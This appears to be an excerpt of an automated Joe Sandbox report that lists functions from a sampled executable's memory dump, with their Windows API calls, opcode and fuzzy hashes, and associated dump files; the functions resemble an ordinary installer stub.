String ID:
API String ID: 1375471231-0
Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction ID: 8c4969e502f5bc4c8dfdefb7e9c2ba363b64d1215f12130c86bef4ebeef6f559
Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction Fuzzy Hash: 19C08C30310902DACA802B209F087173960AB80340F158439A683E00B4CA30A065C92D

Uniqueness

Uniqueness Score: -1.00%

Function 004060CA Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E7,00000000,00000000,0040330B,000000FF,00000004,00000000,00000000,00000000), ref: 004060DE

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction ID: a77d82ba430c16999eb1f2306cb11816df14181100402a9e04059793f1b3015d
Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction Fuzzy Hash: 21E08632150219ABCF10DF948C00EEB3B9CFF04390F018436FD11E3040D630E92197A4

Uniqueness

Uniqueness Score: -1.00%

Function 004060F9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040349D,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 0040610D

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction ID: 78408803ccc59d93ae5352641a5e7b8f709900c8df5e8e9e13d69f82a1dcf02f
Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction Fuzzy Hash: 8FE08C3220021ABBCF109E908C00EEB3FACEB003A0F014432FA26E6050D670E83097A4

Uniqueness

Uniqueness Score: -1.00%

Function 004034EA Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00000000,00000000,00000000,00403247,?), ref: 004034F8

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00401FA9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,00428E20,759223A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00428E20,759223A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D), ref: 00405637
Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Part of subcall function 00405B3A: CreateProcessW.KERNEL32(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0

Part of subcall function 004069F6: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406A07
Part of subcall function 004069F6: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A29

Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: f3bc0ec1b70cec7457a4bdbd95c89a475c59590d6f8743061159391c9333bea6
Instruction ID: 72ab4701d282d41bfb99937ccb951c9b3d992b5a19319da95f503844dddfcbd3
Opcode Fuzzy Hash: f3bc0ec1b70cec7457a4bdbd95c89a475c59590d6f8743061159391c9333bea6
Instruction Fuzzy Hash: EEF0F032804015ABCB20BBA199849DE72B5CF00318B21413FE102B21D1C77C0E42AA6E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040571B Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405779
GetDlgItem.USER32(?,000003EE), ref: 00405788
GetClientRect.USER32(?,?), ref: 004057C5
GetSystemMetrics.USER32(00000002), ref: 004057CC
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057ED
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FE
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405811
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581F
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405832
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405854
ShowWindow.USER32(?,00000008), ref: 00405868
GetDlgItem.USER32(?,000003EC), ref: 00405889
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405899
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058B2
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BE
GetDlgItem.USER32(?,000003F8), ref: 00405797

Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519

GetDlgItem.USER32(?,000003EC), ref: 004058DB
CreateThread.KERNEL32(00000000,00000000,Function_000056AF,00000000), ref: 004058E9
CloseHandle.KERNEL32(00000000), ref: 004058F0
ShowWindow.USER32(00000000), ref: 00405914
ShowWindow.USER32(?,00000008), ref: 00405919
ShowWindow.USER32(00000008), ref: 00405963
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405997
CreatePopupMenu.USER32 ref: 004059A8
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059BC
GetWindowRect.USER32(?,?), ref: 004059DC
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F5
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2D
OpenClipboard.USER32(00000000), ref: 00405A3D
EmptyClipboard.USER32 ref: 00405A43
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4F
GlobalLock.KERNEL32(00000000), ref: 00405A59
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6D
GlobalUnlock.KERNEL32(00000000), ref: 00405A8D
SetClipboardData.USER32(0000000D,00000000), ref: 00405A98
CloseClipboard.USER32 ref: 00405A9E

Strings

{, xrefs: 00405981

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
Instruction ID: 234ab3d0ec1f6487b719ed7b99e1d6b4405f443d9e8d78e252fa94ab3ac4d3a1
Opcode Fuzzy Hash: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
Instruction Fuzzy Hash: 34B139B1900608FFDB11AF60DD89AAE7B79FB48355F00813AFA41BA1A0C7785A51DF58

Uniqueness

Uniqueness Score: -1.00%

Function 004049C7 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404A16
SetWindowTextW.USER32(00000000,?), ref: 00404A40
SHBrowseForFolderW.SHELL32(?), ref: 00404AF1
CoTaskMemFree.OLE32(00000000), ref: 00404AFC
lstrcmpiW.KERNEL32(004326A0,0042CA68,00000000,?,?), ref: 00404B2E
lstrcatW.KERNEL32(?,004326A0), ref: 00404B3A
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B4C

Part of subcall function 00405B9B: GetDlgItemTextW.USER32(?,?,00000400,00404B83), ref: 00405BAE

Part of subcall function 00406805: CharNextW.USER32(?,*?|<>/":,00000000,0043F000,75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
Part of subcall function 00406805: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
Part of subcall function 00406805: CharNextW.USER32(?,0043F000,75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
Part of subcall function 00406805: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F

GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C0F
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C2A

Part of subcall function 00404D83: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
Part of subcall function 00404D83: wsprintfW.USER32 ref: 00404E2D
Part of subcall function 00404D83: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40

Strings

A, xrefs: 00404AEA

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A
API String ID: 2624150263-3554254475
Opcode ID: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
Instruction ID: 8a45afd3ee22384d80319c7ed67abe130e578f1d2b392c1e8909742cb30e522b
Opcode Fuzzy Hash: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
Instruction Fuzzy Hash: FCA192B1900208ABDB11EFA5DD45BAFB7B8EF84314F11803BF611B62D1D77C9A418B69

Uniqueness

Uniqueness Score: -1.00%

Function 004021AF Relevance: 1.6, APIs: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 54fcaebf65a6d80a769d2ffe25eeb1568fba929b3fba522b5b89cb6b807999ae
Instruction ID: f0c409d0c9855dc16f3492d495f607d4fcaf843261c47ee8c1995525671fe781
Opcode Fuzzy Hash: 54fcaebf65a6d80a769d2ffe25eeb1568fba929b3fba522b5b89cb6b807999ae
Instruction Fuzzy Hash: 76411471A00208AFCB40DFE4C989EAD7BB5FF48308B20457AF515EB2D1DB799982CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00402910 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
Instruction ID: 4f8030157269cd498ea314d5a86e386b0cfb994e1dea9c94a4400a3869289cfc
Opcode Fuzzy Hash: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
Instruction Fuzzy Hash: 17F08C71A04104AAD701EBE4EE499AEB378EF14324F60457BE102F31E0DBB85E159B2A

Uniqueness

Uniqueness Score: -1.00%

Function 00406DC6 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
Instruction ID: a5eb8001d75a17d38d83411349fde439c8a9064fda1b18d7f978e280ae41e255
Opcode Fuzzy Hash: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
Instruction Fuzzy Hash: ACE19C71A04709DFCB24CF58C880BAABBF1FF45305F15852EE496A72D1E378AA51CB05

Uniqueness

Uniqueness Score: -1.00%

Function 0040759D Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
Instruction ID: e409ec8ffb443055957628c835c79614664982182129ebc37b3e11cb9bcd83e5
Opcode Fuzzy Hash: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
Instruction Fuzzy Hash: ECC14772E04219CBCF18CF68C4905EEBBB2BF98354F25866AD85677380D7346942CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404F43 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F5B
GetDlgItem.USER32(?,00000408), ref: 00404F66
GlobalAlloc.KERNEL32(00000040,?), ref: 00404FB0
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC7
SetWindowLongW.USER32(?,000000FC,00405550), ref: 00404FE0
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF4
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405006
SendMessageW.USER32(?,00001109,00000002), ref: 0040501C
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405028
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040503A
DeleteObject.GDI32(00000000), ref: 0040503D
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405068
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405074
SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510F
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513F

Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405153
GetWindowLongW.USER32(?,000000F0), ref: 00405181
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518F
ShowWindow.USER32(?,00000005), ref: 0040519F
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040529A
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FF
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405314
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405338
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405358
ImageList_Destroy.COMCTL32(?), ref: 0040536D
GlobalFree.KERNEL32(?), ref: 0040537D
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F6
SendMessageW.USER32(?,00001102,?,?), ref: 0040549F
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AE
InvalidateRect.USER32(?,00000000,00000001), ref: 004054D9
ShowWindow.USER32(?,00000000), ref: 00405527
GetDlgItem.USER32(?,000003FE), ref: 00405532
ShowWindow.USER32(00000000), ref: 00405539

Strings

, xrefs: 00405511
N, xrefs: 004051D8
M, xrefs: 004050F7

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
